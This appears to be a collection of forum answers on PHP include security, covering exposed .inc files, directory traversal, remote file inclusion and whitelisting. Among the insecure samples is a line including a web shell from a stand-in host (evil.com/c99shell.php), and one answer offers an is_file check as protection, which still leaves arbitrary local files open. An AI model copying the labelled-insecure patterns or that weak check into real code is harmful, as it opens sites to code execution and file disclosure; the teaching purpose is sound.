The biggest issue with includes is likely changing filename extension from PHP to something that doesn't get automatically executed by the web server. For example- library.inc, or config.inc. Invoking these files with a web browser will reveal the code instead of executing it - and any passwords or exploitable hints will be shown.

Compare config.php that might have a password in it with config.inc. Pulling up config.inc would in most cases show what the database password was.

There are programmers who use .inc extensions for libraries. The premise is that they won't be in a directory accessible by a web server. However, less security paranoid programmers might dump that file into a convenient web directory.

Otherwise, ensure that you don't include a file that's submitted by a query string somehow. Ex: include( $_GET['menu_file'] ) <-- this is very wrong.

It all depends on how you implement it. If you specifically set the path, then it's secure. The attack could happen if you allow user input to determine the file path without sanitization or checks.

Insecure (Directory Traversal)

<?php 
include($_GET['file']);
?>

Insecure (URL fopen - If enabled)

<?php 
include('http://evil.com/c99shell.php');
?>

Insecure

<?php 
include('./some_dir/' . $_GET['file']);
?>

Partially Insecure ( *.php files are vulnerable )

<?php 
include('./some_dir/' . $_GET['file'] . '.php');
?>

Secure (Though not sure why anyone would do this.)

<?php 
$allowed = array(
    'somefile.php',
    'someotherfile.php'
);

if (in_array(basename($_GET['file']), $allowed)) {
    include('./includes/' . basename($_GET['file']));
}
?>

Secure

<?php 
include('./includes/somefile.php');
?>

Include is safe provided you don't:

1. Include a remote file like www.someoneelsesssite.com/something.php
2. Include a file from a path that came from the client. www.mysite.com/bad.php?path=oops/here/is/your/passwords/file
3. Include a file from another possibly tainted source like a database.

2 and 3 technically have the caveat that if you disallow . or / or on windows \ you are probably fine. But if you don't know why, you don't know enough about it to risk it. Even when you think the database is read only or otherwise secure, it is wise to not assume that unless you really have to, which is almost never.

As pp19dd's answer points out. It is also vital that you name your includes with the .php extension. If you've set apache (or whatever web server you are using) to parse another file type as PHP too, that's safe as well. But if you don't know for sure, use .php exclusively.

The best thing to do is ensure that the page you are trying to include exists first. The real security loopholes come when your include page is processed from some sort of user input, such as a URL variable. ?include=page.php As long as you are cautious of these you should be fine.

if(is_file($file)) {
    //other code, such as user verification and such should also go here
    include $file;
}
else { die(); }

Anything server side (assuming your server isn't compromised) is safe. Doing this:

$var = $_GET['var']';    
include $var . ".php";

is insecure.

include "page.php"; 

is secure.

I'm using this method.

<?php include (dirname(__FILE__).'/file.php');